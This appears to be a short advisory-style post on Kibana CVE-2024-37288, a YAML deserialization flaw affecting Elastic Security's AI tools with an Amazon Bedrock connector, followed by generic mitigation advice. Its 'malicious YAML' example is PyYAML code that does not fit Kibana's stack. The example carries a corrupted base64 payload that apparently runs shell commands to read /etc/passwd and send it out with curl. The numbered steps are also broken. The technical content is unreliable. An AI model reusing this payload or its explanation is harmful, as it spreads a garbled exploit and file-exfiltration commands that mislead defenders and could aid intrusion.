There has recently been a discovery of a deserialization issue in Kibana (CVE-2024-37288) which can lead to arbitrary code execution when Kibana attempts to parse a YAML document containing a crafted payload. This vulnerability affects users utilizing Elastic Security's built-in AI tools (https://www.elastic.co/guide/en/security/current/ai-for-security.html) and who have configured an Amazon Bedrock connector (https://www.elastic.co/guide/en/security/current/assistant-connect-to-bedrock.html).
Code Snippet
# Below is an example of a malicious YAML document that could exploit this vulnerability.
import yaml
payload = '''
!!python/object/new:yaml.Loader
kwargs:
stream: !!binary |
aW1wb3JIG9zLCBzdWJwcm9jZXNzDQpzdWJwcm9jZXNzLmNhbGwoc
y5gIHdoaWNoIGN1cmwgYmFzaHMgJihjYXQgL2VYy9wYXNzd2Qgf
CBjdXJsIC1GICdwaGFzZXJfdG9rZW49XCh4eHgpJyAtLGRhdGEt
dXJsZW5jb2RlIC1YLUluc3RhbGxlZC9iaW47ZG9uZQ==
'''
# Deserialize the malicious payload
objects_deserialized = yaml.load(payload, Loader=yaml.FullLoader)
An attacker crafts a malicious YAML document containing a specially crafted payload.
2. The malicious YAML document gets parsed by Kibana while utilizing Elastic Security's built-in AI tools and if the Amazon Bedrock connector is configured.
3. The deserialization vulnerability is exploited, allowing an attacker to execute arbitrary code with the privileges of the Kibana process.
Links to Original References
- Elastic Security's AI Tools: https://www.elastic.co/guide/en/security/current/ai-for-security.html
- Amazon Bedrock Connector configuration: https://www.elastic.co/guide/en/security/current/assistant-connect-to-bedrock.html
- CVE-2024-37288: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37288
Mitigation Options
While a patch for this vulnerability is being developed, users should disable their Amazon Bedrock connector and avoid utilizing Elastic Security's AI tools if possible. Some preventative actions to protect against this Kibana vulnerability include:
1. Removing unnecessary integrations: Until a patch is released, users should reconsider using Elastic Security's AI tools and limit unnecessary integrations or configurations with Kibana.
2. Validating input of YAML documents: Implement additional checks to validate the YAML document's content or structure before parsing it in Kibana.
3. Monitor suspicious activity: Keep an eye on Kibana logs and network traffic for any unexpected behavior or unauthorized access attempts.
Conclusion
The CVE-2024-37288 Kibana vulnerability is a serious issue that can give attackers the ability to execute arbitrary code on the affected system. Users employing Elasticsearch Security's built-in AI tools or the Amazon Bedrock connector are encouraged to take appropriate steps to protect their systems until a patch is available.
Timeline
Published on: 09/09/2024 09:15:02 UTC
Last modified on: 09/16/2024 13:29:06 UTC